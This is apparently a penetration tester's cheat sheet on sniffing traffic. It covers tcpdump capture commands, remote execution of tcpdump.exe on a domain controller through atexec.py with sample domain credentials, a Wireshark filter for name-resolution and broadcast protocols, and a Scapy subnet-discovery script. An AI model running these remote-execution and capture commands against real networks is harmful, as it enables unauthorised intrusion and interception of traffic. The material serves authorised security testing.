# Sniff Traffic

## tcpdump

* <http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/home>

Linux (while connected via SSH):

```
$ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' &
```

Windows:

```
$ wget 'http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812'
$ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap'
$ sleep 30m
```

## Wireshark

* <https://wiki.wireshark.org/CaptureSetup/CapturePrivileges>
* <https://research.801labs.org/cracking-an-ntlmv2-hash/>

### Filters

Protocols to consider:

* [DTP](https://en.wikipedia.org/wiki/Dynamic_Trunking_Protocol) (Dynamic Trunking Protocol)
* [OSPF](https://en.wikipedia.org/wiki/Open_Shortest_Path_First) (Open Shortest Path First)
* [SSDP](https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol) (Simple Service Discovery Protocol)
* [ARP](https://en.wikipedia.org/wiki/Address_Resolution_Protocol) (Address Resolution Protocol)
* [LLMNR](https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution) (Link-Local Multicast Name Resolution)
* [NBNS](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP) (NetBIOS Name Service)
* [mDNS](https://en.wikipedia.org/wiki/Multicast_DNS) (Multicast DNS)
* [ICMPv6](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol_for_IPv6) (Internet Control Message Protocol version 6)
* [DHCPv6](https://en.wikipedia.org/wiki/DHCPv6) (Dynamic Host Configuration Protocol version 6)

```
dtp || ospf || ssdp || arp || llmnr || nbns || mdns || icmpv6 || dhcpv6
```

## Scapy

* <https://gist.github.com/Dfte/9cfeb87892557fd098de78f68b1b1390>

Passively detect live subnets:

```
$ sudo python3 SilentListener.py -i eth0 -o ranges.txt [--scan]
```